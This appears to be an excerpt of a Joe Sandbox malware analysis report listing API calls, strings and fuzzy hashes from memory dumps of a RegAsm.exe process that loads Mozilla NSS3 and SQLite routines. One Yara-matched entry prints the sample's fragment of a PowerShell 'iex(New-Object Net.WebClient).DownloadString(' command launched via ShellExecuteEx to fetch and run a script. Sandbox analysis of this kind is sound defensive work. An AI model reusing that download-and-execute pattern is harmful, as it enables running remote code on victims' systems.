                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3590961175-0
                                                                                                        • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                        • Instruction ID: 92701ef6c89674c4b00282b80c4bae0724cac8d7e639c1e23601189c3a4af325
                                                                                                        • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                        • Instruction Fuzzy Hash: 3951A571A0820A8FEB10EF69DC44B16B3F5AF44369F154029EE15D7F51EB32E864CB91
                                                                                                        APIs
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1F88FC
                                                                                                          • Part of subcall function 6C20BE30: SECOID_FindOID_Util.NSS3(6C1C311B,00000000,?,6C1C311B,?), ref: 6C20BE44
                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C1F8913
                                                                                                          • Part of subcall function 6C210FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1B87ED,00000800,6C1AEF74,00000000), ref: 6C211000
                                                                                                          • Part of subcall function 6C210FF0: PR_NewLock.NSS3(?,00000800,6C1AEF74,00000000), ref: 6C211016
                                                                                                          • Part of subcall function 6C210FF0: PL_InitArenaPool.NSS3(00000000,security,6C1B87ED,00000008,?,00000800,6C1AEF74,00000000), ref: 6C21102B
                                                                                                        • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6C2DD864,?), ref: 6C1F8947
                                                                                                          • Part of subcall function 6C20E200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C20E245
                                                                                                          • Part of subcall function 6C20E200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C20E254
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C1F895B
                                                                                                        • DER_GetInteger_Util.NSS3(?), ref: 6C1F8973
                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C1F8982
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C1F89EC
                                                                                                        • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C1F8A12
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2145430656-0
                                                                                                        • Opcode ID: cdee0ed69e2dd5b0cf3731968987f7fd7b2fa15deda53f17f04a806700602a45
                                                                                                        • Instruction ID: 2971e7a5bfcc045083760c93a1f84f61f4f5995b967964ff1fe04ead8cd97fc8
                                                                                                        • Opcode Fuzzy Hash: cdee0ed69e2dd5b0cf3731968987f7fd7b2fa15deda53f17f04a806700602a45
                                                                                                        • Instruction Fuzzy Hash: F43108A2B0860457F720562AAC417AA36D5ABE231CF250637D939D7B81FB35C4578193
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1D4E90
                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C1D4EA9
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1D4EC6
                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C1D4EDF
                                                                                                        • PL_HashTableLookup.NSS3 ref: 6C1D4EF8
                                                                                                        • PR_Unlock.NSS3 ref: 6C1D4F05
                                                                                                        • PR_Now.NSS3 ref: 6C1D4F13
                                                                                                        • PR_Unlock.NSS3 ref: 6C1D4F3A
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                        • String ID:
                                                                                                        • API String ID: 326028414-0
                                                                                                        • Opcode ID: b5e0a566d97b5500f7a1a9e68b632a10f12168b0e822bc673d710aa58bda7996
                                                                                                        • Instruction ID: 389863e6730393b1bea8a8349adb4fdccc4e5f2183e7195fdf0d31de63dd623a
                                                                                                        • Opcode Fuzzy Hash: b5e0a566d97b5500f7a1a9e68b632a10f12168b0e822bc673d710aa58bda7996
                                                                                                        • Instruction Fuzzy Hash: C6413DB5A006099FCB00EF7CD0849AAFBF4FF49314B068569DC999B711EB30E895CB91
                                                                                                        APIs
                                                                                                        • PR_LogFlush.NSS3(00000000,00000000,?,?,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C086C
                                                                                                          • Part of subcall function 6C2C0930: EnterCriticalSection.KERNEL32(?,00000000,?,6C2C0C83), ref: 6C2C094F
                                                                                                          • Part of subcall function 6C2C0930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C2C0C83), ref: 6C2C0974
                                                                                                          • Part of subcall function 6C2C0930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0983
                                                                                                          • Part of subcall function 6C2C0930: _PR_MD_UNLOCK.NSS3(?,?,6C2C0C83), ref: 6C2C099F
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C087D
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C0892
                                                                                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C2C798A), ref: 6C2C08AA
                                                                                                        • free.MOZGLUE(?,00000000,00000000,?,?,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C08C7
                                                                                                        • free.MOZGLUE(?,00000000,00000000,?,?,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C08E9
                                                                                                        • free.MOZGLUE(?,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C08EF
                                                                                                        • PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C090E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3145526462-0
                                                                                                        • Opcode ID: c944aac9f31f8396919fc9a166b3e16226c49660cd834d9d74d854cb9c61269c
                                                                                                        • Instruction ID: c769f26dcf81cee76cac70be00b1c49e7e15e75b00e0db38b7dd24cd18a494d1
                                                                                                        • Opcode Fuzzy Hash: c944aac9f31f8396919fc9a166b3e16226c49660cd834d9d74d854cb9c61269c
                                                                                                        • Instruction Fuzzy Hash: E21190F2B022454FEF00AB58DC86786377CAB52659F180325FD1A87A40DB76E814CBE3
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C134FC4
                                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C1351BB
                                                                                                        Strings
                                                                                                        • misuse, xrefs: 6C1351AF
                                                                                                        • unable to delete/modify user-function due to active statements, xrefs: 6C1351DF
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C1351B4
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C1351A5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_logstrlen
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
                                                                                                        • API String ID: 3619038524-4115156624
                                                                                                        • Opcode ID: e2739a92228bc80fcc0251c7dbc823b90363854a3eeba3a125aa06362193b9e9
                                                                                                        • Instruction ID: 2efaa76b1954100424176dc0c117716db2a8e7ef1d2ee1dd76f00368c74c0c54
                                                                                                        • Opcode Fuzzy Hash: e2739a92228bc80fcc0251c7dbc823b90363854a3eeba3a125aa06362193b9e9
                                                                                                        • Instruction Fuzzy Hash: CC71CEB16042199FEB00CE29CC80B9A77F9BF5970CF095524FD1D9BA95D33AE850CBA1
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00412EC0
                                                                                                        Strings
                                                                                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412E18
                                                                                                        • ')", xrefs: 00412E13
                                                                                                        • C:\ProgramData\, xrefs: 00412DA3
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412E5B
                                                                                                        • .ps1, xrefs: 00412DF3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                         • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                         • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                         • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                         • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                         • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                         • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                         • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                         • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                         • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        • API String ID: 2215929589-1989157005
                                                                                                        • Opcode ID: a3660bf6eb38366a5fc88e1f2295be1a68adea8c2c4e3bb7b595f6666764ac78
                                                                                                        • Instruction ID: d4bc49303887be4e6334ac6b4843b1e71d055e880c24203978c9a7e3e1ca0007
                                                                                                        • Opcode Fuzzy Hash: a3660bf6eb38366a5fc88e1f2295be1a68adea8c2c4e3bb7b595f6666764ac78
                                                                                                        • Instruction Fuzzy Hash: 4641FB71E00119ABCF11FBA6DD469CDB7B4AF04308F61406BF514B7191DBB86E8A8B98
                                                                                                        APIs
                                                                                                        • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C1FAB3E,?,?,?), ref: 6C1FAC35
                                                                                                          • Part of subcall function 6C1DCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C1DCF16
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C1FAB3E,?,?,?), ref: 6C1FAC55
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C1FAB3E,?,?), ref: 6C1FAC70
                                                                                                          • Part of subcall function 6C1DE300: TlsGetValue.KERNEL32 ref: 6C1DE33C
                                                                                                          • Part of subcall function 6C1DE300: EnterCriticalSection.KERNEL32(?), ref: 6C1DE350
                                                                                                          • Part of subcall function 6C1DE300: PR_Unlock.NSS3(?), ref: 6C1DE5BC
                                                                                                          • Part of subcall function 6C1DE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C1DE5CA
                                                                                                          • Part of subcall function 6C1DE300: TlsGetValue.KERNEL32 ref: 6C1DE5F2
                                                                                                          • Part of subcall function 6C1DE300: EnterCriticalSection.KERNEL32(?), ref: 6C1DE606
                                                                                                          • Part of subcall function 6C1DE300: PORT_Alloc_Util.NSS3(?), ref: 6C1DE613
                                                                                                        • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C1FAC92
                                                                                                        • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C1FAB3E), ref: 6C1FACD7
                                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C1FAD10
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C1FAD2B
                                                                                                          • Part of subcall function 6C1DF360: TlsGetValue.KERNEL32(00000000,?,6C1FA904,?), ref: 6C1DF38B
                                                                                                          • Part of subcall function 6C1DF360: EnterCriticalSection.KERNEL32(?,?,?,6C1FA904,?), ref: 6C1DF3A0
                                                                                                          • Part of subcall function 6C1DF360: PR_Unlock.NSS3(?,?,?,?,6C1FA904,?), ref: 6C1DF3D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                         • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 2926855110-0
                                                                                                        • Opcode ID: c549ccbfb7465b945b8dc2cc8e5da32fad915b9aaa32a1e42b3a56ffcfd73ff0
                                                                                                        • Instruction ID: 2ca8735b2dd38b3a85150595d37f9f2798ca927b70da4efe1c1937a6740c93bb
                                                                                                        • Opcode Fuzzy Hash: c549ccbfb7465b945b8dc2cc8e5da32fad915b9aaa32a1e42b3a56ffcfd73ff0
                                                                                                        • Instruction Fuzzy Hash: AE311BB1E006095FEB009F658C609AF77B6AF84718B198128E83557740EB35DD16C7A1
                                                                                                        APIs
                                                                                                        • PR_Now.NSS3 ref: 6C1D8C7C
                                                                                                          • Part of subcall function 6C279DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C2C0A27), ref: 6C279DC6
                                                                                                          • Part of subcall function 6C279DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C2C0A27), ref: 6C279DD1
                                                                                                          • Part of subcall function 6C279DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C279DED
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C1D8CB0
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1D8CD1
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1D8CE5
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1D8D2E
                                                                                                        • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C1D8D62
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1D8D93
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                         • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3131193014-0
                                                                                                        • Opcode ID: 87a8cf2f6b782d2d0df238974a45e63372402d0ba95f171b9d36e0dbbf825666
                                                                                                        • Instruction ID: b8d2941d489b25f9834b65c8862e9fc6d2aafa98cce78c75736a95c5e77a0164
                                                                                                        • Opcode Fuzzy Hash: 87a8cf2f6b782d2d0df238974a45e63372402d0ba95f171b9d36e0dbbf825666
                                                                                                        • Instruction Fuzzy Hash: 1A312371A01605AFEB00AF68DC447DAB7B4BF15318F26013AEE1967B90D770B964C7D1
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C1CE728,?,00000038,?,?,00000000), ref: 6C1D2E52
                                                                                                        • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C1D2E66
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C1D2E7B
                                                                                                        • EnterCriticalSection.KERNEL32(00000000), ref: 6C1D2E8F
                                                                                                        • PL_HashTableLookup.NSS3(?,?), ref: 6C1D2E9E
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1D2EAB
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1D2F0D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                         • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                        • String ID:
                                                                                                        • API String ID: 3106257965-0
                                                                                                        • Opcode ID: 73859f53a11b29ceae641d8152eeb86f43c519c97b1b0afc812d221087fe5706
                                                                                                        • Instruction ID: 4fdd1e7b59ddfe2bdba24cbffbec03cee14361556346530fdee1554ac3b59726
                                                                                                        • Opcode Fuzzy Hash: 73859f53a11b29ceae641d8152eeb86f43c519c97b1b0afc812d221087fe5706
                                                                                                        • Instruction Fuzzy Hash: 8531387AA00105AFEB00AF68DC4497AB778FF15258B058575EC1887B11E731ED64C7E2
                                                                                                        APIs
                                                                                                        • PORT_ArenaMark_Util.NSS3(?,6C21CD93,?), ref: 6C21CEEE
                                                                                                          • Part of subcall function 6C2114C0: TlsGetValue.KERNEL32 ref: 6C2114E0
                                                                                                          • Part of subcall function 6C2114C0: EnterCriticalSection.KERNEL32 ref: 6C2114F5
                                                                                                          • Part of subcall function 6C2114C0: PR_Unlock.NSS3 ref: 6C21150D
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C21CD93,?), ref: 6C21CEFC
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C21CD93,?), ref: 6C21CF0B
                                                                                                          • Part of subcall function 6C210840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C2108B4
                                                                                                        • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C21CD93,?), ref: 6C21CF1D
                                                                                                          • Part of subcall function 6C20FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C208D2D,?,00000000,?), ref: 6C20FB85
                                                                                                          • Part of subcall function 6C20FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C20FBB1
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C21CD93,?), ref: 6C21CF47
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C21CD93,?), ref: 6C21CF67
                                                                                                        • SECITEM_CopyItem_Util.NSS3(?,00000000,6C21CD93,?,?,?,?,?,?,?,?,?,?,?,6C21CD93,?), ref: 6C21CF78
